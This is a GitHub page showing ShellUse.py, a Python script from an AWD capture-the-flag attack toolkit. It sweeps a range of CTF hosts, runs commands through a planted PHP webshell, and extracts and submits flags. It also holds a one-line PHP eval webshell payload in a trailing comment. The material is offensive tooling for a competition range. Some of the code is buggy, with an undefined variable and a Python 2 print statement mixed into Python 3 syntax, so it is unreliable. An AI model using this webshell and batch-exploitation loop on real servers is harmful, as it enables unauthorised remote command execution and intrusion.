forked from L0nm4r/MyAWD
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathShellUse.py
60 lines (46 loc) · 1.63 KB
/
ShellUse.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from typing import Pattern
import requests
import re
from lib.log import outputscreen
from submitFlag import submit_flag
'''利用正则/切片匹配flag'''
def extract_flag(content):
pattern = "flag{(.*)}"
flag = re.search(pattern,content,flags=0).group(0)
return flag
def web_shell_exec(shell_url,shell_method,shell_password,shell_command):
info=open("info.txt","w")
if shell_method=="GET":
try:
res = requests.get(url=f"{shell_url}+?{shell_password}={shell_command}",timeout=1)
if res.status_code == requests.codes.ok:
result = url+" connect shell sucess" + res.text
outputscreen.success(result)
print >>info,result
return res.text
except:
outputscreen.error(shell_url + " connect shell fail!")
return ''
if shell_method=="POST":
try:
res = requests.post(url=url,data={shell_password:shell_command},timeout=1)
if res.status_code == requests.codes.ok:
result = url+" connect shell sucess" + res.text
outputscreen.success(result)
return res.text
except:
outputscreen.error(shell_url + " connect shell fail!")
return ''
info.close()
token = 'test'
event = 'test'
for i in range(1,255):
url=f"http://192-168-1-{i}.awd.bugku.cn/upload/admin/shell.php"
command='system("ls");'
cmdRes = web_shell_exec(url,"POST","L0nm4r",command)
flag = extract_flag(cmdRes)
if flag !='':
submit_flag(url,flag,token,event)
'''
<?php @eval($_POST["l0nm4r"]);?>
'''